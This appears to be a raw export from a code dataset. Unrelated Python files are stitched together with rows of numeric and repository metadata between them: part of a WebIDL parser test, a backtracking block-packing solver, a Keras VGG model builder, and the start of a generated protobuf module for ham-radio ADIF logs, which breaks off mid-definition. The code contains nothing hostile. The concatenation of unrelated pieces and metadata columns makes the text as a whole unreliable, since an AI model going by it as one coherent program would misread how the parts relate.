for i in range(len(attrs)):
data = testData[i]
attr = attrs[i]
(QName, name, type, readonly) = data
checkAttr(attr, QName % "ArrayOfNullableTypes", name, type % "OrNullArray", readonly)
iface = results[5]
harness.ok(isinstance(iface, WebIDL.IDLInterface),
"Should be an IDLInterface")
harness.check(iface.identifier.QName(), "::TestAttrNullableArrayOfNullableTypes", "Interface has the right QName")
harness.check(iface.identifier.name, "TestAttrNullableArrayOfNullableTypes", "Interface has the right name")
harness.check(len(iface.members), len(testData), "Expect %s members" % len(testData))
attrs = iface.members
for i in range(len(attrs)):
data = testData[i]
attr = attrs[i]
(QName, name, type, readonly) = data
checkAttr(attr, QName % "NullableArrayOfNullableTypes", name, type % "OrNullArrayOrNull", readonly)
parser = parser.reset()
threw = False
try:
parser.parse("""
interface A {
[SetterInfallible] readonly attribute boolean foo;
};
""")
results = parser.finish()
except Exception, x:
threw = True
harness.ok(threw, "Should not allow [SetterInfallible] on readonly attributes")
| 41.389439
| 118
| 0.58839
| 1,312
| 12,541
| 5.619665
| 0.096037
| 0.154483
| 0.068358
| 0.024413
| 0.769565
| 0.730774
| 0.716533
| 0.716533
| 0.716533
| 0.716533
| 0
| 0.000785
| 0.288813
| 12,541
| 302
| 119
| 41.52649
| 0.825877
| 0
| 0
| 0.222628
| 0
| 0
| 0.631848
| 0.023044
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.00365
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6b9751b50b6295f2007b03754c615fad69738adc
| 12,378
|
py
|
Python
|
sasuke 34/J.py
|
conganhhcmus/Codelearn.io
|
cb698924fe9eac27fb8b2cef4e03c7619cb4fe81
|
[
"MIT"
] | null | null | null |
sasuke 34/J.py
|
conganhhcmus/Codelearn.io
|
cb698924fe9eac27fb8b2cef4e03c7619cb4fe81
|
[
"MIT"
] | null | null | null |
sasuke 34/J.py
|
conganhhcmus/Codelearn.io
|
cb698924fe9eac27fb8b2cef4e03c7619cb4fe81
|
[
"MIT"
] | null | null | null |
a = arr = [[False for i in range(100)] for j in range(100)]
ans = 0
sl = 0
block= []
def findLargestRectangle(blockNumber):
global sl
global block
block = blockNumber
for i in block: sl += i
for i in range(1,9):
find(i, 1)
return ans
def find(r,n):
global ans
global a
# calc result
if (((n - 1) * 4) % r == 0):
l = (n - 1) * 4 // r
check = True
for i in range(l):
for j in range(r):
if (not a[i][j]):
check = False
break
if (not check): break
if (check and ans < (n-1)*4):
ans = (n-1)*4
# condition end
if (n > sl): return
#fill - backtracking
for i in range(80):
for j in range(r):
if (not a[i][j]):
if (block[0] > 0):
if (not a[i + 1][j] and not a[i + 2][j] and not a[i + 3][j]):
a[i][j] = True
a[i + 1][j] = True
a[i + 2][j] = True
a[i + 3][j] = True
block[0]-=1
find(r, n + 1)
a[i][j] = False
a[i + 1][j] = False
a[i + 2][j] = False
a[i + 3][j] = False
block[0]+=1
if (j + 3 < r and not a[i][j + 1] and not a[i][j + 2] and not a[i][j + 3]):
a[i][j] = True
a[i][j + 1] = True
a[i][j + 2] = True
a[i][j + 3] = True
block[0]-=1
find(r, n + 1)
a[i][j] = False
a[i][j + 1] = False
a[i][j + 2] = False
a[i][j + 3] = False
block[0]+=1
if (block[1] > 0):
if (j + 1 < r and not a[i][j + 1] and not a[i + 1][j] and not a[i + 1][j + 1]):
a[i][j] = True
a[i][j + 1] = True
a[i + 1][j] = True
a[i + 1][j + 1] = True
block[1]-=1
find(r, n + 1)
a[i][j] = False
a[i][j + 1] = False
a[i + 1][j] = False
a[i + 1][j + 1] = False
block[1]+=1
if (block[2] > 0):
if (j + 2 < r and not a[i][j + 1] and not a[i][j + 2] and not a[i + 1][j + 2]):
a[i][j] = True
a[i][j + 1] = True
a[i][j + 2] = True
a[i + 1][j + 2] = True
block[2]-=1
find(r, n + 1)
a[i][j] = False
a[i][j + 1] = False
a[i][j + 2] = False
a[i + 1][j + 2] = False
block[2]+=1
if (j + 1 < r and not a[i][j + 1] and not a[i + 1][j] and not a[i + 2][j]):
a[i][j] = True
a[i][j + 1] = True
a[i + 1][j] = True
a[i + 2][j] = True
block[2]-=1
find(r, n + 1)
a[i][j] = False
a[i][j + 1] = False
a[i + 1][j] = False
a[i + 2][j] = False
block[2]+=1
if (j + 2 < r and not a[i + 1][j] and not a[i + 1][j + 1] and not a[i + 1][j + 2]):
a[i][j] = True
a[i + 1][j] = True
a[i + 1][j + 1] = True
a[i + 1][j + 2] = True
block[2]-=1
find(r, n + 1)
a[i][j] = False
a[i + 1][j] = False
a[i + 1][j + 1] = False
a[i + 1][j + 2] = False
block[2]+=1
if (j > 0):
if (not a[i + 1][j] and not a[i + 2][j] and not a[i + 2][j - 1]):
a[i][j] = True
a[i + 1][j] = True
a[i + 2][j] = True
a[i + 2][j - 1] = True
block[2]-=1
find(r, n + 1)
a[i][j] = False
a[i + 1][j] = False
a[i + 2][j] = False
a[i + 2][j - 1] = False
block[2]+=1
if (block[3] > 0):
if (j + 2 < r and not a[i][j + 1] and not a[i + 1][j + 1] and not a[i + 1][j + 2]):
a[i][j] = True
a[i][j + 1] = True
a[i + 1][j + 1] = True
a[i + 1][j + 2] = True
block[3]-=1
find(r, n + 1)
a[i][j] = False
a[i][j + 1] = False
a[i + 1][j + 1] = False
a[i + 1][j + 2] = False
block[3]+=1
if (j > 0):
if (not a[i + 1][j] and not a[i + 1][j - 1] and not a[i + 2][j - 1]):
a[i][j] = True
a[i + 1][j] = True
a[i + 1][j - 1] = True
a[i + 2][j - 1] = True
block[3]-=1
find(r, n + 1)
a[i][j] = False
a[i + 1][j] = False
a[i + 1][j - 1] = False
a[i + 2][j - 1] = False
block[3]+=1
if (block[4] > 0):
if (j + 1 < r and j > 0):
if(not a[i][j + 1] and not a[i + 1][j] and not a[i + 1][j - 1]):
a[i][j] = True
a[i][j + 1] = True
a[i + 1][j] = True
a[i + 1][j - 1] = True
block[4]-=1
find(r, n + 1)
a[i][j] = False
a[i][j + 1] = False
a[i + 1][j] = False
a[i + 1][j - 1] = False
block[4]+=1
if (j + 1 < r):
if (not a[i + 1][j] and not a[i + 1][j + 1] and not a[i + 2][j + 1]):
a[i][j] = True
a[i + 1][j] = True
a[i + 1][j + 1] = True
a[i + 2][j + 1] = True
block[4]-=1
find(r, n + 1)
a[i][j] = False
a[i + 1][j] = False
a[i + 1][j + 1] = False
a[i + 2][j + 1] = False
block[4]+=1
if (block[5] > 0):
if (j + 2 < r and not a[i][j + 1] and not a[i][j + 2] and not a[i + 1][j]):
a[i][j] = True
a[i][j + 1] = True
a[i][j + 2] = True
a[i + 1][j] = True
block[5]-=1
find(r, n + 1)
a[i][j] = False
a[i][j + 1] = False
a[i][j + 2] = False
a[i + 1][j] = False
block[5]+=1
if (j + 1 < r and not a[i][j + 1] and not a[i + 1][j + 1] and not a[i + 2][j + 1]):
a[i][j] = True
a[i][j + 1] = True
a[i + 1][j + 1] = True
a[i + 2][j + 1] = True
block[5]-=1
find(r, n + 1)
a[i][j] = False
a[i][j + 1] = False
a[i + 1][j + 1] = False
a[i + 2][j + 1] = False
block[5]+=1
if (j > 1):
if(not a[i + 1][j] and not a[i + 1][j - 1] and not a[i + 1][j - 2]):
a[i][j] = True
a[i + 1][j] = True
a[i + 1][j - 1] = True
a[i + 1][j - 2] = True
block[5]-=1
find(r, n + 1)
a[i][j] = False
a[i + 1][j] = False
a[i + 1][j - 1] = False
a[i + 1][j - 2] = False
block[5]+=1
if (j + 1 < r):
if (not a[i + 1][j] and not a[i + 2][j] and not a[i + 2][j + 1]):
a[i][j] = True
a[i + 1][j] = True
a[i + 2][j] = True
a[i + 2][j + 1] = True
block[5]-=1
find(r, n + 1)
a[i][j] = False
a[i + 1][j] = False
a[i + 2][j] = False
a[i + 2][j + 1] = False
block[5]+=1
if (block[6] > 0):
if (j + 2 < r and not a[i][j + 1] and not a[i][j + 2] and not a[i + 1][j + 1]):
a[i][j] = True
a[i][j + 1] = True
a[i][j + 2] = True
a[i + 1][j + 1] = True
block[6]-=1
find(r, n + 1)
a[i][j] = False
a[i][j + 1] = False
a[i][j + 2] = False
a[i + 1][j + 1] = False
block[6]+=1
if (j + 1 < r and not a[i + 1][j] and not a[i + 1][j + 1] and not a[i + 2][j]):
a[i][j] = True
a[i + 1][j] = True
a[i + 1][j + 1] = True
a[i + 2][j] = True
block[6]-=1
find(r, n + 1)
a[i][j] = False
a[i + 1][j] = False
a[i + 1][j + 1] = False
a[i + 2][j] = False
block[6]+=1
if (j > 0):
if (not a[i + 1][j] and not a[i + 1][j - 1] and not a[i + 2][j]):
a[i][j] = True
a[i + 1][j] = True
a[i + 1][j - 1] = True
a[i + 2][j] = True
block[6]-=1
find(r, n + 1)
a[i][j] = False
a[i + 1][j] = False
a[i + 1][j - 1] = False
a[i + 2][j] = False
block[6]+=1
if (j + 1 < r and j > 0):
if(not a[i + 1][j] and not a[i + 1][j + 1] and not a[i + 1][j - 1]):
a[i][j] = True
a[i + 1][j] = True
a[i + 1][j - 1] = True
a[i + 1][j + 1] = True
block[6]-=1
find(r, n + 1)
a[i][j] = False
a[i + 1][j] = False
a[i + 1][j - 1] = False
a[i + 1][j + 1] = False
block[6]+=1
return
print(findLargestRectangle([0,0,1,1,0,1,0]))
| 42.979167
| 103
| 0.230166
| 1,555
| 12,378
| 1.832154
| 0.027653
| 0.148122
| 0.097929
| 0.130572
| 0.848719
| 0.835381
| 0.833977
| 0.829765
| 0.824149
| 0.822745
| 0
| 0.086339
| 0.630393
| 12,378
| 287
| 104
| 43.12892
| 0.536393
| 0.003555
| 0
| 0.770909
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007273
| false
| 0
| 0
| 0
| 0.014545
| 0.003636
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
6ba14f388ea2cd8e378e871024edd16eb5c1b8c8
| 4,462
|
py
|
Python
|
vgg/vgg.py
|
amir-saniyan/KerasNets
|
6031fd19b81a41422a3fea65d793509bac01092f
|
[
"MIT"
] | null | null | null |
vgg/vgg.py
|
amir-saniyan/KerasNets
|
6031fd19b81a41422a3fea65d793509bac01092f
|
[
"MIT"
] | null | null | null |
vgg/vgg.py
|
amir-saniyan/KerasNets
|
6031fd19b81a41422a3fea65d793509bac01092f
|
[
"MIT"
] | null | null | null |
import tensorflow as tf
def build_model(configuration='vgg19', input_shape=(224, 224, 3), num_classes=1000, dropout_rate=0.5):
if configuration not in ['vgg11', 'vgg13', 'vgg16', 'vgg19']:
raise Exception('Configuration should be one of these values: vgg11, vgg13, vgg16, vgg19')
inputs = tf.keras.Input(shape=input_shape)
x = tf.keras.layers.Conv2D(filters=64, kernel_size=(3, 3), strides=1, padding='same',
activation=tf.keras.activations.relu)(inputs)
if configuration == 'vgg13' or configuration == 'vgg16' or configuration == 'vgg19':
x = tf.keras.layers.Conv2D(filters=64, kernel_size=(3, 3), strides=1, padding='same',
activation=tf.keras.activations.relu)(x)
x = tf.keras.layers.MaxPooling2D(pool_size=(2, 2), strides=2, padding='valid')(x)
x = tf.keras.layers.Conv2D(filters=128, kernel_size=(3, 3), strides=1, padding='same',
activation=tf.keras.activations.relu)(x)
if configuration == 'vgg13' or configuration == 'vgg16' or configuration == 'vgg19':
x = tf.keras.layers.Conv2D(filters=128, kernel_size=(3, 3), strides=1, padding='same',
activation=tf.keras.activations.relu)(x)
x = tf.keras.layers.MaxPooling2D(pool_size=(2, 2), strides=2, padding='valid')(x)
x = tf.keras.layers.Conv2D(filters=256, kernel_size=(3, 3), strides=1, padding='same',
activation=tf.keras.activations.relu)(x)
x = tf.keras.layers.Conv2D(filters=256, kernel_size=(3, 3), strides=1, padding='same',
activation=tf.keras.activations.relu)(x)
if configuration == 'vgg16' or configuration == 'vgg19':
x = tf.keras.layers.Conv2D(filters=256, kernel_size=(3, 3), strides=1, padding='same',
activation=tf.keras.activations.relu)(x)
if configuration == 'vgg19':
x = tf.keras.layers.Conv2D(filters=256, kernel_size=(3, 3), strides=1, padding='same',
activation=tf.keras.activations.relu)(x)
x = tf.keras.layers.MaxPooling2D(pool_size=(2, 2), strides=2, padding='valid')(x)
x = tf.keras.layers.Conv2D(filters=512, kernel_size=(3, 3), strides=1, padding='same',
activation=tf.keras.activations.relu)(x)
x = tf.keras.layers.Conv2D(filters=512, kernel_size=(3, 3), strides=1, padding='same',
activation=tf.keras.activations.relu)(x)
if configuration == 'vgg16' or configuration == 'vgg19':
x = tf.keras.layers.Conv2D(filters=512, kernel_size=(3, 3), strides=1, padding='same',
activation=tf.keras.activations.relu)(x)
if configuration == 'vgg19':
x = tf.keras.layers.Conv2D(filters=512, kernel_size=(3, 3), strides=1, padding='same',
activation=tf.keras.activations.relu)(x)
x = tf.keras.layers.MaxPooling2D(pool_size=(2, 2), strides=2, padding='valid')(x)
x = tf.keras.layers.Conv2D(filters=512, kernel_size=(3, 3), strides=1, padding='same',
activation=tf.keras.activations.relu)(x)
x = tf.keras.layers.Conv2D(filters=512, kernel_size=(3, 3), strides=1, padding='same',
activation=tf.keras.activations.relu)(x)
if configuration == 'vgg16' or configuration == 'vgg19':
x = tf.keras.layers.Conv2D(filters=512, kernel_size=(3, 3), strides=1, padding='same',
activation=tf.keras.activations.relu)(x)
if configuration == 'vgg19':
x = tf.keras.layers.Conv2D(filters=512, kernel_size=(3, 3), strides=1, padding='same',
activation=tf.keras.activations.relu)(x)
x = tf.keras.layers.MaxPooling2D(pool_size=(2, 2), strides=2, padding='valid')(x)
x = tf.keras.layers.Flatten()(x)
x = tf.keras.layers.Dense(units=4096, activation=tf.keras.activations.relu)(x)
x = tf.keras.layers.Dropout(rate=dropout_rate)(x)
x = tf.keras.layers.Dense(units=4096, activation=tf.keras.activations.relu)(x)
x = tf.keras.layers.Dropout(rate=dropout_rate)(x)
outputs = tf.keras.layers.Dense(units=num_classes, activation=tf.keras.layers.Softmax())(x)
model = tf.keras.models.Model(inputs=inputs, outputs=outputs)
return model
| 49.032967
| 102
| 0.607127
| 575
| 4,462
| 4.66087
| 0.114783
| 0.125373
| 0.135821
| 0.135821
| 0.865672
| 0.85709
| 0.85709
| 0.85709
| 0.85709
| 0.85709
| 0
| 0.058685
| 0.240027
| 4,462
| 90
| 103
| 49.577778
| 0.731643
| 0
| 0
| 0.827586
| 0
| 0
| 0.05827
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017241
| false
| 0
| 0.017241
| 0
| 0.051724
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6bdaa8c6396ce9b1f3be8da8a1f72271f9224e4a
| 62,996
|
py
|
Python
|
demo/adif_pb2.py
|
k0swe/adif-json-protobuf
|
90cc62e38919611754e0dca15498d0444d6d5871
|
[
"Apache-2.0"
] | 3
|
2020-10-08T16:11:59.000Z
|
2021-08-06T05:13:36.000Z
|
demo/adif_pb2.py
|
k0swe/adif-json-protobuf
|
90cc62e38919611754e0dca15498d0444d6d5871
|
[
"Apache-2.0"
] | 4
|
2020-10-18T00:47:19.000Z
|
2021-08-18T23:27:58.000Z
|
demo/adif_pb2.py
|
k0swe/adif-json-protobuf
|
90cc62e38919611754e0dca15498d0444d6d5871
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: adif.proto
from google.protobuf.internal import enum_type_wrapper
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.protobuf import timestamp_pb2 as google_dot_protobuf_dot_timestamp__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='adif.proto',
package='adif',
syntax='proto3',
serialized_options=b'Z\010.;adifpb',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n\nadif.proto\x12\x04\x61\x64if\x1a\x1fgoogle/protobuf/timestamp.proto\"=\n\x04\x41\x64if\x12\x1c\n\x06header\x18\x01 \x01(\x0b\x32\x0c.adif.Header\x12\x17\n\x04qsos\x18\x02 \x03(\x0b\x32\t.adif.Qso\"\x82\x01\n\x06Header\x12\x14\n\x0c\x61\x64if_version\x18\x01 \x01(\t\x12\x35\n\x11\x63reated_timestamp\x18\x02 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12\x12\n\nprogram_id\x18\x03 \x01(\t\x12\x17\n\x0fprogram_version\x18\x04 \x01(\t\"\x82\x07\n\x03Qso\x12&\n\x0flogging_station\x18\x01 \x01(\x0b\x32\r.adif.Station\x12(\n\x11\x63ontacted_station\x18\x02 \x01(\x0b\x32\r.adif.Station\x12&\n\x0bpropagation\x18\x03 \x01(\x0b\x32\x11.adif.Propagation\x12\x0c\n\x04\x62\x61nd\x18\x04 \x01(\t\x12\x0f\n\x07\x62\x61nd_rx\x18\x05 \x01(\t\x12\x0c\n\x04\x66req\x18\x06 \x01(\x01\x12\x0f\n\x07\x66req_rx\x18\x07 \x01(\x01\x12\x0c\n\x04mode\x18\x08 \x01(\t\x12\x0f\n\x07submode\x18\t \x01(\t\x12\x13\n\x0b\x64istance_km\x18\n \x01(\r\x12+\n\x07time_on\x18\x0b \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12,\n\x08time_off\x18\x0c \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12\x0e\n\x06random\x18\r \x01(\x08\x12\x14\n\x0crst_received\x18\x0e \x01(\t\x12\x10\n\x08rst_sent\x18\x0f \x01(\t\x12\x0b\n\x03swl\x18\x10 \x01(\x08\x12\x10\n\x08\x63omplete\x18\x11 \x01(\t\x12\x0f\n\x07\x63omment\x18\x12 \x01(\t\x12\r\n\x05notes\x18\x13 \x01(\t\x12\"\n\x07\x63ontest\x18\x14 \x01(\x0b\x32\x11.adif.ContestData\x12\x17\n\x0f\x61ward_submitted\x18\x15 \x03(\t\x12\x15\n\raward_granted\x18\x16 \x03(\t\x12&\n\x10\x63redit_submitted\x18\x17 \x03(\x0b\x32\x0c.adif.Credit\x12$\n\x0e\x63redit_granted\x18\x18 \x03(\x0b\x32\x0c.adif.Credit\x12\x12\n\npublic_key\x18\x19 \x01(\t\x12\x1d\n\x07\x63lublog\x18\x1a \x01(\x0b\x32\x0c.adif.Upload\x12\x1c\n\x06hrdlog\x18\x1b \x01(\x0b\x32\x0c.adif.Upload\x12\x1c\n\x06qrzcom\x18\x1c \x01(\x0b\x32\x0c.adif.Upload\x12\x17\n\x04\x65qsl\x18\x1d \x01(\x0b\x32\t.adif.Qsl\x12\x17\n\x04lotw\x18\x1e \x01(\x0b\x32\t.adif.Qsl\x12\x17\n\x04\x63\x61rd\x18\x1f \x01(\x0b\x32\t.adif.Qsl\x12.\n\x0b\x61pp_defined\x18 \x03(\x0b\x32\x19.adif.Qso.AppDefinedEntry\x1a\x31\n\x0f\x41ppDefinedEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01\"\xf7\x05\n\x07Station\x12\x0f\n\x07op_call\x18\x01 \x01(\t\x12\x0f\n\x07op_name\x18\x02 \x01(\t\x12\x13\n\x0bgrid_square\x18\x03 \x01(\t\x12\x10\n\x08latitude\x18\x04 \x01(\x01\x12\x11\n\tlongitude\x18\x05 \x01(\x01\x12\r\n\x05power\x18\x06 \x01(\x01\x12\x0b\n\x03rig\x18\x07 \x01(\t\x12\x0f\n\x07\x61ntenna\x18\x08 \x01(\t\x12\x17\n\x0f\x61ntenna_azimuth\x18\t \x01(\x05\x12\x19\n\x11\x61ntenna_elevation\x18\n \x01(\x05\x12\x12\n\nowner_call\x18\x0b \x01(\t\x12\x14\n\x0cstation_call\x18\x0c \x01(\t\x12\x0b\n\x03\x61ge\x18\r \x01(\r\x12\x12\n\nsilent_key\x18\x0e \x01(\x08\x12\x0f\n\x07qsl_via\x18\x0f \x01(\t\x12\x0f\n\x07\x61\x64\x64ress\x18\x10 \x01(\t\x12\x0e\n\x06street\x18\x11 \x01(\t\x12\x0c\n\x04\x63ity\x18\x12 \x01(\t\x12\x13\n\x0bpostal_code\x18\x13 \x01(\t\x12\x0e\n\x06\x63ounty\x18\x14 \x01(\t\x12\r\n\x05state\x18\x15 \x01(\t\x12\x0f\n\x07\x63ountry\x18\x16 \x01(\t\x12\x0c\n\x04\x64xcc\x18\x17 \x01(\r\x12\x11\n\tcontinent\x18\x18 \x01(\t\x12\r\n\x05\x65mail\x18\x19 \x01(\t\x12\x0b\n\x03web\x18\x1a \x01(\t\x12\x0f\n\x07\x63q_zone\x18\x1b \x01(\r\x12\x10\n\x08itu_zone\x18\x1c \x01(\r\x12\x10\n\x08\x64\x61rc_dok\x18\x1d \x01(\t\x12\r\n\x05\x66ists\x18\x1e \x01(\r\x12\x10\n\x08\x66ists_cc\x18\x1f \x01(\r\x12\x0c\n\x04iota\x18 \x01(\t\x12\x16\n\x0eiota_island_id\x18! \x01(\r\x12\x0b\n\x03pfx\x18\" \x01(\t\x12\x0e\n\x06region\x18# \x01(\t\x12\x0c\n\x04skcc\x18$ \x01(\t\x12\x0b\n\x03sig\x18% \x01(\t\x12\x10\n\x08sig_info\x18& \x01(\t\x12\x10\n\x08sota_ref\x18\' \x01(\t\x12\x0f\n\x07ten_ten\x18( \x01(\r\x12\x16\n\x0eusaca_counties\x18) \x01(\t\x12\r\n\x05uksmg\x18* \x01(\r\x12\x12\n\nvucc_grids\x18+ \x01(\t\"\x82\x02\n\x0bPropagation\x12\x18\n\x10propagation_mode\x18\x01 \x01(\t\x12\x0f\n\x07\x61_index\x18\x02 \x01(\r\x12\x0f\n\x07k_index\x18\x03 \x01(\r\x12\x18\n\x10solar_flux_index\x18\x04 \x01(\r\x12\x10\n\x08\x61nt_path\x18\x05 \x01(\t\x12\x12\n\nforce_init\x18\x06 \x01(\x08\x12\x12\n\nmax_bursts\x18\x07 \x01(\r\x12\x1a\n\x12meteor_shower_name\x18\x08 \x01(\t\x12\x11\n\tnr_bursts\x18\x0b \x01(\r\x12\x10\n\x08nr_pings\x18\x0c \x01(\r\x12\x10\n\x08sat_mode\x18\t \x01(\t\x12\x10\n\x08sat_name\x18\n \x01(\t\"\x9f\x01\n\x0b\x43ontestData\x12\x12\n\ncontest_id\x18\x01 \x01(\t\x12\x13\n\x0bserial_sent\x18\x02 \x01(\t\x12\x17\n\x0fserial_received\x18\x03 \x01(\t\x12\x14\n\x0c\x61rrl_section\x18\x04 \x01(\t\x12\x15\n\rstation_class\x18\x05 \x01(\t\x12\r\n\x05\x63heck\x18\x06 \x01(\t\x12\x12\n\nprecedence\x18\x07 \x01(\t\",\n\x06\x43redit\x12\x0e\n\x06\x63redit\x18\x01 \x01(\t\x12\x12\n\nqsl_medium\x18\x02 \x01(\t\"d\n\x06Upload\x12/\n\x0bupload_date\x18\x01 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12)\n\rupload_status\x18\x02 \x01(\x0e\x32\x12.adif.UploadStatus\"\xd7\x01\n\x03Qsl\x12-\n\tsent_date\x18\x01 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12\x13\n\x0bsent_status\x18\x02 \x01(\t\x12\x10\n\x08sent_via\x18\x03 \x01(\t\x12\x31\n\rreceived_date\x18\x04 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12\x17\n\x0freceived_status\x18\x05 \x01(\t\x12\x14\n\x0creceived_via\x18\x06 \x01(\t\x12\x18\n\x10received_message\x18\x07 \x01(\t*^\n\x0cUploadStatus\x12\x0b\n\x07UNKNOWN\x10\x00\x12\x13\n\x0fUPLOAD_COMPLETE\x10\x01\x12\x11\n\rDO_NOT_UPLOAD\x10\x02\x12\x19\n\x15MODIFIED_AFTER_UPLOAD\x10\x03\x42\nZ\x08.;adifpbb\x06proto3'
,
dependencies=[google_dot_protobuf_dot_timestamp__pb2.DESCRIPTOR,])
_UPLOADSTATUS = _descriptor.EnumDescriptor(
name='UploadStatus',
full_name='adif.UploadStatus',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='UNKNOWN', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='UPLOAD_COMPLETE', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='DO_NOT_UPLOAD', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='MODIFIED_AFTER_UPLOAD', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=2701,
serialized_end=2795,
)
_sym_db.RegisterEnumDescriptor(_UPLOADSTATUS)
UploadStatus = enum_type_wrapper.EnumTypeWrapper(_UPLOADSTATUS)
UNKNOWN = 0
UPLOAD_COMPLETE = 1
DO_NOT_UPLOAD = 2
MODIFIED_AFTER_UPLOAD = 3
_ADIF = _descriptor.Descriptor(
name='Adif',
full_name='adif.Adif',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='header', full_name='adif.Adif.header', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='qsos', full_name='adif.Adif.qsos', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=53,
serialized_end=114,
)
_HEADER = _descriptor.Descriptor(
name='Header',
full_name='adif.Header',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='adif_version', full_name='adif.Header.adif_version', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='created_timestamp', full_name='adif.Header.created_timestamp', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='program_id', full_name='adif.Header.program_id', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='program_version', full_name='adif.Header.program_version', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=117,
serialized_end=247,
)
_QSO_APPDEFINEDENTRY = _descriptor.Descriptor(
name='AppDefinedEntry',
full_name='adif.Qso.AppDefinedEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='adif.Qso.AppDefinedEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='adif.Qso.AppDefinedEntry.value', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1099,
serialized_end=1148,
)
_QSO = _descriptor.Descriptor(
name='Qso',
full_name='adif.Qso',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
